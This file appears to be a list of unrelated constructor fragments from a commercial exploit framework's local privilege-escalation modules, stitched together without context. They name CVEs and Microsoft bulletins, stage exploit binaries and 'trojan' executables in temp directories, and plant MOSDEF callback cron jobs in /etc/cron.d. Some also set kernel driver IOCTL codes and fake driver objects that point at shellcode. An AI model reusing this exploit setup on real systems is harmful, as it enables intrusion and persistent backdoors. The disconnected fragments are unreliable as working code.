def __init__(self): LocalExploit.__init__(self) self.name = NAME self.crondir = "/etc/cron.d" self.__pagesizes_cache = {} self.method = 3 self.forkpid = 0
def __init__(self): LocalExploit.__init__(self) self.interface = 'vmnet1' self.dstAddr = '\xff\xff\xff\xff\xff\xff' self.loop = True self.loopInterval = 10 self.use_local_interface = False
def __init__(self): LocalExploit.__init__(self) self.local_helper_32 = "backdoors/osx-mosdef-upgrade-32" self.local_helper_64 = "backdoors/osx-mosdef-upgrade-64" self.remote_exp = "" self.remote_helper = ""
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.symdict = {} self.RECVPORT = 9876 self.SENDPORT = self.RECVPORT + 1 self.MMAP_FAIL = [0xfffffff3, 0xfffffff2, 0xfffffff1, 0xffffffff]
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.shellcode = "" self.password = "******" self.user = "******" self.newuser = "******"
def __init__(self): LocalExploit.__init__(self) self.setInfo(DESCRIPTION) self.name=NAME self.host='' self.port=445 self.needsNoShellcode=1 self.version=0
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.lx = 'exploits/SYSRET/Resources/x' # local path exploit self.lh = 'exploits/SYSRET/Resources/h' # local path helper self.dx = '/tmp/x' # remote path exploit self.dh = '/tmp/h' # remote path helper
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.local_exploit = 'exploits/CVE_2012_0056/Resources/exploit32' # local path exploit self.remote_exploit = '/tmp/xx' # remote path to exploit self.local_cback = None self.remote_cback = '/tmp/t' # remote path to callback self.tmppath = os.path.join(os.path.dirname(__file__), 'Resources')
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.upload_filename_exe = 'Resources/ms_ntvdm/ms_ntvdm.exe' self.upload_filename_dll = 'Resources/ms_ntvdm/ms_ntvdm.dll' self.result = 0 self.badstring = '\0\xff' self.shellcode = "" return
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.upload_filename = 'Resources/ms08_049.exe' self.remote_filename = '' self.result = 0 self.badstring = '\0\xff' self.listenerArgsDict['fromcreatethread'] = 1 self.use_local_interface = False
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.fd = -1 self.suid = "" self.suids = {} self.wxdir = "" self.randdir = "" self.version = 0
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.files = ['sysret.exe'] self.local_path = os.path.join(os.path.dirname(__file__), 'Resources') self.remote_path = '%TMP%\\' # remote base path self.remote_name = '%s.exe' % random.randint(0, 1000) self.isX64 = False
def __init__(self): LocalExploit.__init__(self) self.use_local_interface = False self.SOLlocals = {} self.SOLlocals['CVE-2006-4842'] = getModuleExploitClass( 'CVE_2006_4842', which='CVE_2006_4842') self.CVE = None self.name = NAME
def __init__(self): LocalExploit.__init__(self) self.setInfo(DESCRIPTION) self.name = NAME self.version = 1 self.badstring = '' self.subesp = 0 #not necessary? self.supportedNodeArgs = [['linuxNode']] self.use_local_interface = False
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.MSKBLAYOUT = ['MS_KBLAYOUT.exe', 'MS_KBLAYOUT.dat'] self.local_path = os.path.abspath( os.path.join(os.path.dirname(__file__), "Resources/")) self.remote_path = '%TMP%\\' # remote base path self.trojan_name = 'CB%s.EXE' % random.randint(0, 1000) return
def __init__(self): LocalExploit.__init__(self) self.setInfo(DESCRIPTION) self.logpath = os.getcwd( ) + '/3rdparty/D2SEC/exploits/d2sec_drosera/logs/' self.name = NAME self.src_path = 'C:\\' self.remote_path = '%TMP%\\' # remote base path self.client_drosera = 'u.exe' self.driver_drosera = 'drosera.sys'
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.files = {'x86' :'ms_enableeudc.exe', 'x64': 'ms_enableeudc-64.exe' } self.MS_ENABLEEUDC = [ 'ms_enableeudc.exe' ] self.local_path = os.path.join(os.path.dirname(__file__), 'Resources') self.remote_path = '%TMP%\\' # remote base path self.trojan_name = 'CB%s.EXE'%random.randint(0,1000) self.isX64 = False return
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.linux_lh = 'exploits/sudo_timestamp/Resources/h_linux' self.linux_lx = 'exploits/sudo_timestamp/Resources/x_linux' self.mac_lh_32 = 'exploits/sudo_timestamp/Resources/h_mac_32' self.mac_lh_64 = 'exploits/sudo_timestamp/Resources/h_mac_64' self.mac_lx = 'exploits/sudo_timestamp/Resources/x_mac.py' self.dh = '/tmp/h' # remote path helper self.dx = '/tmp/x' # remote path exploit
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.base_fontname = "ms11_032_base.otf" self.files = {'x86': 'ms11_032.exe', 'x64': 'ms11_032-64.exe'} self.MS11_032 = ['ms11_032.exe', 'ms11_032.otf'] self.local_path = os.path.join(os.path.dirname(__file__), 'Resources') self.remote_path = '%TMP%\\' # remote base path self.trojan_name = 'CB%s.EXE' % random.randint(0, 1000) self.isX64 = False return
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.TASKSCHEDULER = [ ('ms_taskscheduler.exe', 'ms_taskscheduler%d.exe' % random.randint(0, 1000)) ] self.local_path = os.path.abspath( os.path.join(os.path.dirname(__file__), "Resources/")) self.remote_path = '%TMP%\\' # remote base path self.trojan_name = 'CB%d.EXE' % random.randint(0, 1000)
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.result = 0 self.device_name = "\\\\.\\NDProxy" self.ioctl_code = 0x8fff23cc self.ioctl_buf_addr = 0x0 self.ioctl_buf_len = 0 self.ioctl_buf = "" self.minor_version = 0 self.major_version = 0 self.x64 = 0
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.result = 0 self.device_name = "\\\\.\\nicm" self.ioctl_code = 0x143B6B self.ioctl_buf_addr = 0x0 self.ioctl_buf_len = 0 self.ioctl_buf = "" self.minor_version = 0 self.major_version = 0 self.x64 = 0
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.node = None self.files = {'x86': 'ms11_098.exe'} #get path relative to our canvas_root_directory from engine.config import canvas_root_directory self.local_path = os.path.abspath( os.path.join(os.path.dirname(__file__), "Resources/")) self.remote_path = '%TMP%\\' # remote base path self.trojan_name = 'CB%4.4d.EXE' % random.randint(0, 5000)
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.fd = -1 self.suid = "" self.suids = {} self.wxdir = "" self.randdir = "" self.version = 0 self.mosdef_callback = "spawn-MOSDEF" self.cron_file = "/etc/cron.d/mosdef" self.cron_job = None
def __init__(self): LocalExploit.__init__(self) self.result = "" self.name = NAME self.respath = os.path.abspath( os.path.join(os.path.dirname(__file__), "Resources/")) self.binname = "elevateprivs" self.dstfilename = "elevateprivs" self.dstdir = None self.excluded_devices = ["none", "sysfs", "devpts", "proc"] self.potential_directories = [ "/data/data/com.android.browser", "/data/anr", "/tmp", "/temp", "/sdcard" ]
def __init__(self): LocalExploit.__init__(self) self.port = 80 #HTTP port self.rtspport = 554 #RTSP port self.listeners = {} # force engine to use hand selected callback interface .. can't use autofind self.autoFind = False self.badstring = "\x00" self.setVersions() self.version = 1 self.name = NAME self.listenerArgsDict["fromcreatethread"] = 1 self.use_local_interface = False self.subesp = 1000
def __init__(self): LocalExploit.__init__(self) self.result = "" self.name = NAME self.local_path = os.path.dirname(__file__) self.binary_path = os.path.join(self.local_path, "bin") self.db_path = os.path.join(self.local_path, "db") self.fname = DEFAULT_TARGET_SHADOW self.fsize = DEFAULT_TARGET_SIZE self.flush_cache = False self.debug = True self.sb_addr = 0 self.ino_addr = 0 self.page_addr = 0 self.fcontent = '' #self.db_cache = os.path.join(self.db_path, 'cache' % randint) if not os.path.exists(self.db_path): os.makedirs(self.db_path) return
def __init__(self): LocalExploit.__init__(self) self.result = "" self.name = NAME self.local_path = os.path.dirname(__file__) self.binary_path = os.path.join(self.local_path, "bin") self.db_path = os.path.join(self.local_path, "db") self.upload_dir = None self.local_exp_name = 'winleak_spectre.exe' self.debug = False self.JD = None self.Skew1 = None self.GBG = None self.Data = None self.nr_users = None self.users = [] #self.db_cache = os.path.join(self.db_path, 'cache' % randint) if not os.path.exists(self.db_path): os.makedirs(self.db_path) return
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.result = 0 self.device_name = "\\\\.\\I2OExec" self.ioctl_code = 0x222F80 self.ioctl_buf_addr = 0x0 self.ioctl_buf_len = 0 self.ioctl_buf = "" # BBBB gets replaced by a pointer to our shellcode self.fake_driver_object = "\x41\x41\x41\x41" * 28 + "BBBB" self.fake_driver_object_len = len(self.fake_driver_object) # AAAA is replaced by a pointer to our DRIVER_OBJECT # 0x11111111 is a positive stack size that works reliably to bypass the bugcheck self.fake_device_object = "AAAABBBBAAAA" + ("\x00\x00\x00\x00" * 9) + "\x11\x11\x11\x11" self.fake_device_object_len = len(self.fake_device_object) self.shellcode_addr = 0x0 self.shellcode_len = 0 self.shellcode = ""
def __init__(self): LocalExploit.__init__(self) self.name = NAME self.code_page_off = 0